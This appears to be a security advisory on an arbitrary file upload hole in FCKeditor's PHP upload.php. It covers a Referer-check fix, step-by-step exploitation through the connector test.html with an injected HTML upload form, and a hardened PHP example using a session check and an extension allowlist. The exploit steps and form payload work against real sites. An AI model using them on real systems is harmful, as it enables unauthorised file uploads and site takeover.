Vulnerable file: editors/fckeditor/editor/filemanager/upload/php/upload.php
The fix circulated online is as follows.
Fix: delete the FCK editor and use a different editor,
or find the file editors/fckeditor/editor/filemanager/upload/php/upload.php
and, below the lines
require('config.php');
require('util.php');
add the following code:
// Prevent external submissions
function outsidepost()
{
    // Host name this script is being served under
    $servername=$_SERVER['SERVER_NAME'];
    // Referer header sent by the client (may be absent, hence the @)
    $sub_from=@$_SERVER['HTTP_REFERER'];
    $sub_len=strlen($servername);
    // Skip the 7 characters of "http://" and take the host part of the Referer
    $checkfrom=substr($sub_from,7,$sub_len);
    // Reject the request when the Referer host differs from this server
    if($checkfrom!=$servername){
        echo("you don't outsidepost!");
        exit;
    }
}
outsidepost();
This blocks external submissions, but it does not block internal ones.
Exploitation method:
1. Open editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
2. In the Current Folder box, enter
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
Then click Get Folders and Files; an upload form appears, and files of any type can be uploaded.
PS: If the editors directory and the upload folder have been set up with 403, 500 or 404 permissions, the exploit does not work.
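
The gap described above (the Referer test stops off-site forms but not a form rendered by the site's own test.html), shown as an added PHP example that is not code from the original post or from FCKeditor. The host name, the session key admin_id and the extension allowlist are assumptions; the hardened gate replaces the Referer test with a session check plus an allowlist.

```php
<?php
// Added example. Not FCKeditor code; names below are hypothetical.

// The Referer test from the fix above, as a pure function so it can be exercised.
function referer_check_passes(string $serverName, string $referer): bool
{
    // Same logic as outsidepost(): skip "http://" (7 chars), compare the host part.
    return substr($referer, 7, strlen($serverName)) === $serverName;
}

// Hardened gate: ignore Referer, require an authenticated session
// (hypothetical key 'admin_id') and an allowlisted file extension.
function upload_allowed(array $session, string $fileName, array $allowedExt): bool
{
    if (empty($session['admin_id'])) {
        return false;                        // anonymous caller: reject
    }
    if (preg_match('/[\x00\/\\\\]/', $fileName)) {
        return false;                        // NUL byte or path separator in name
    }
    $parts = explode('.', strtolower($fileName));
    if (count($parts) !== 2 || $parts[0] === '') {
        return false;                        // exactly one extension; "a.php.jpg" is rejected
    }
    return in_array($parts[1], $allowedExt, true);
}

$host = 'www.example.com';                   // constructed sample host
$referers = [                                // constructed sample Referer values
    'off-site form'       => 'http://other.example/form.html',
    'same-site test.html' => 'http://www.example.com/editors/fckeditor/editor/'
                           . 'filemanager/browser/default/connectors/test.html',
];
foreach ($referers as $label => $ref) {
    printf("%-20s Referer check: %s\n", $label,
        referer_check_passes($host, $ref) ? 'passes' : 'blocked');
}

$allowed = ['mp3', 'mp4', 'avi'];            // assumed allowlist for Type=Media
$requests = [                                // constructed: [session, file name]
    'anonymous, clip.mp4'  => [[], 'clip.mp4'],
    'logged in, shell.php' => [['admin_id' => 1], 'shell.php'],
    'logged in, clip.mp4'  => [['admin_id' => 1], 'clip.mp4'],
];
foreach ($requests as $label => [$session, $name]) {
    printf("%-20s hardened gate: %s\n", $label,
        upload_allowed($session, $name, $allowed) ? 'accepted' : 'rejected');
}
```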